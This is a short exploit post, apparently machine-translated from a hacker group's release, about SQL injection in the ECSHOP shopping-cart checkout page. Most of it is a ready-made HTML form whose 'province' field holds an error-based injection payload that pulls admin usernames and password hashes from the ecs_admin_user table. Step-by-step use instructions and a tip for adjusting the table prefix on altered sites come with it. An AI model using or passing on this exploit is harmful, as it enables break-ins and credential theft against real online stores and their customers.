ECSHOP flow page injection and exploitation

Method of exploits: first register. Add any item to the shopping cart. On the page of filling in the delivery address, select a region, select a region, and copy the address to exp. EXP:

<Form name = "form1" method = "post"> simple EXP [Silic Group Hacker Army] <input name = "country" type = "text" style = "country ""display: none "value =" 1 "/> <br/> <textarea rows =" 5 "style =" font-family: Times New Roman; font-size: 14pt; "cols =" 80 "name =" province "> 11' and (select 1 from (select count (*), concat (floor (rand (0) * 2), 0x3a, (select concat (user_name, 0x3a, password) FROM ecs_admin_user limit 0, 1) from information_schema.tables limit 0, 1) x from information_schema.tables group by x)) and 1 = 1 # </textarea> <input name = "district" type = "text" style = "display: none "value =" 1294 "/> <input name =" consignee "type =" text "style =" display: none "value =" 1111111 "/> <input name =" email "type =" text "style =" display: none "value =" root@WebShell.cc "/> <input name =" address "type =" text "style =" display: none "value =" 111111 "/> <input name =" tel "type =" text "style =" display: none "value =" 1111111 "/> <input name =" step "type =" text "style =" display: none "value =" consignee "/> <input name =" act "type =" text "style =" display: none "value =" checkout "/> <br/> address: <input name =" theAction "type =" text "id =" theAction "value =" http://xxx.com/flow.php?step=consignee "Size =" 50 "> <br/> <input type =" submit "value =" ship to this address "onClick =" this. form. action = this. form. theAction. value; "name =" Submit "> <br/> </form>

 

In addition, if the Query fails, see the error statement MySQL server Error report: Array ([0] => Array ([message] => MySQL Query error) [1] => Array ([SQL] => SELECT region_id, region_name FROM 'asky880 '. '17 _ region' WHERE r. The default database name has been changed for this website. In exp, modify ecs_admin_user to 17_admin_user.